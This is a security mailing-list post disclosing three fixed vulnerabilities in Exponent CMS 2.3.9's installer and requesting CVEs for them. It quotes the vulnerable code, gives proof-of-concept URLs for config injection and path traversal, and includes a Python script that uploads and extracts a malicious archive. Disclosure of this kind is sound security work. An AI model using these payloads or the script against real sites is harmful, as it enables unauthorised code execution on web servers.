Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 22 Sep 2016 21:35:46 +0800
From: Carl Peng <felixk3y@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request - Exponent CMS 2.3.9 multi-vulnerabilities in install code

Hi , I reported the following vulnerabilities in the install code to the
ExponentCMS team some days ago and fixed now.

1. Arbitrary code execution
https://github.com/exponentcms/exponent-cms/blob/master/install/index.php#L56-L63
```
lines 56 - 63
if (isset($_REQUEST['sc'])) {
    if (file_exists("../framework/conf/config.php")) {
        // Update the config
        foreach ($_REQUEST['sc'] as $key => $value) {
//            $value = expString::sanitize($value);
            expSettings::change($key, $value);
        }
    }
```
The function of the expSettings::change() is to modify the config
file("framework/conf/config.php"), but there is failed to filter user input
lead to we could write anything to config file.

Proof of concept:
http://www.exponentcms.org/install/index.php?sc[SMTP_PORT]=25\\');phpinfo();//
  phpinfo() will be executed.
Tips:
Visit " http://www.exponentcms.org/install/index.php?sc[SMTP_PORT]=25 " can
be recovery it.


2. RCE vulnerability
https://github.com/exponentcms/exponent-cms/blob/master/install/index.php#L47-L53
```
if (isset($_REQUEST['profile'])) {
    expSettings::activateProfile($_REQUEST['profile']); //here
    expTheme::removeSmartyCache(); //FIXME is this still necessary?
    expSession::clearAllUsersSessionCache();
    flash('message', gt("New Configuration Profile Loaded"));
    header('Location: ../index.php');
}
```
expSettings::activateProfile() :
https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expSettings.php#L587-L593
```
copy(BASE . "framework/conf/profiles/$profile.php", BASE .
"framework/conf/config.php"); //here
// tag it with the profile name
$fh = fopen(BASE . "framework/conf/config.php", "a");
```
We can upload a "php" file to website, then copy it to
"framework/conf/config.php"

Proof of concept:
first, We first upload a "php" to website (by “uploader_paste.php”), such
as /files/test.php
then visit
http://www.exponentcms.org/install/index.php?profile=../../../files/test,
then will copy "/files/test.php" to "framework/conf/config.php".


3. File Upload vulnerability
https://github.com/exponentcms/exponent-cms/blob/master/install/index.php#L77-L94
```
$files = BASE . "themes/" . DISPLAY_THEME_REAL . "/" .
$_REQUEST['install_sample'] . ".tar.gz";
if (!file_exists($files)) {
    $files = BASE . "install/samples/" . $_REQUEST['install_sample'] .
".tar.gz"; //here
}
if (file_exists($files)) { // only install if there was an archive
    include_once(BASE . 'external/Tar.php');
    $tar = new Archive_Tar($files); //Extract .tar.gz file
    $return = $tar->extract(BASE);
}
```
The function of those code is extract .tar.gz file, but through
"install_sample", the parameter of "$files" is what we can control, so we
could upload a .tar.gz evil file, then extract it.

Proof of concept:
first, upload .eql and .tar.gz files(by “uploader_paste.php”),such as
/files/10.tar.gz
then visit
http://www.exponentcms.org/install/index.php?install_sample=../../files/10
Successfully extract file:  http://www.exponentcms.org/3.php

python poc code:
```
import random
import requests
host = 'http://www.exponentcms.org/'

def upload(name, url):
files = {'upload' : (name, open('evil.tar.gz'))}
resp = requests.post(url, files=files)
return resp.content

if 'http://' not in host: host = 'http://{}'.format(host)

host = host.rstrip('/')
url = '{}/framework/modules/file/connector/uploader_paste.php'.format(host)
rstr = random.randint(10,99)

req_eql = upload('{}.eql'.format(rstr), url)
req_tar = upload('{}.tar.gz'.format(rstr), url)

if 'tar.gz' in req_tar:
req_inc =
requests.get('{}/install/index.php?install_sample=../../files/{}'.format(host,
rstr))

evilfile = '{}/3.php'.format(host)
req_ = requests.get(evilfile)

if 'GIF89a' in req_.content:
print evil-file
```

And now, all vulnerabilities have been fixed.
https://exponentcms.lighthouseapp.com/projects/61783/changesets/4ae457ff1bf80e8b61286cd125ca794b25564e86
https://github.com/exponentcms/exponent-cms/commit/4ae457ff1bf80e8b61286cd125ca794b25564e86


these issues was reported by Peng Hua of silence.com.cn Inc. and I would
like
to request  CVEs for these issues (if not done so).


-------------------http://www.silence.com.cn/
penghua@...ence.com.cn
PKAV Team

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ